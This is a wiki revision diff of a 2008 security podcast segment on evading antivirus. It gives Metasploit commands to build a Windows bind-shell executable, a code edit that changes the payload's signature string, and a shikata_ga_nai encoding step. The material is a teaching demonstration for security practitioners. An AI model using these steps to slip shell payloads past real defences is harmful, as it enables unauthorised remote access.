Difference between revisions of "Episode125"

From Security Weekly Wiki
Jump to navigationJump to search
Line 1: Line 1:
 
= Tech Segment: Bypassing Anti-Virus Software The Script-Kiddie Way =
 
= Tech Segment: Bypassing Anti-Virus Software The Script-Kiddie Way =
  
<pre>msfpayload windows/shell_bind_tcp LPORT=6453 X > svn-payload.exe</pre>
+
== Pass #1 - Metasploit Payload - Unmodified ==
 +
 
 +
<pre>msfpayload windows/shell_bind_tcp LPORT=6453 X > payload.exe</pre>
  
 
<pre>
 
<pre>
Line 16: Line 18:
 
Options: LPORT=6453
 
Options: LPORT=6453
 
</pre>
 
</pre>
 +
 +
== Pass #2 - Metasploit Payload - Changed Version String ==
  
 
<pre>  
 
<pre>  
Line 25: Line 29:
 
                         "Options: " + options + "\n"
 
                         "Options: " + options + "\n"
 
</pre>
 
</pre>
 +
 +
== Pass #3 - Metasploit Payload Encoded With Shikata Ga Nai ==
  
 
<pre>msfencode x86/shikata_ga_nai -i svn-payload.exe -t exe > svn-encode-payload.exe</pre>
 
<pre>msfencode x86/shikata_ga_nai -i svn-payload.exe -t exe > svn-encode-payload.exe</pre>

Revision as of 18:08, 29 September 2008

Tech Segment: Bypassing Anti-Virus Software The Script-Kiddie Way

Pass #1 - Metasploit Payload - Unmodified

msfpayload windows/shell_bind_tcp LPORT=6453 X > payload.exe
bash-3.2# strings payload.exe 
!This program cannot be run in DOS mode.
.text
.rdata
@.data
.bss
.idata
Created by msfpayload (http://www.metasploit.com).
Payload: windows/shell_bind_tcp
 Length: 317
Options: LPORT=6453

Pass #2 - Metasploit Payload - Changed Version String

 
if (cmd =~ /^x/)
                note =
                        "PaulDotCom's Evil Payload\n" +
                        "Payload: " + payload.refname + "\n" +
                        " Length: " + buf.length.to_s + "\n" +
                        "Options: " + options + "\n"

Pass #3 - Metasploit Payload Encoded With Shikata Ga Nai

msfencode x86/shikata_ga_nai -i svn-payload.exe -t exe > svn-encode-payload.exe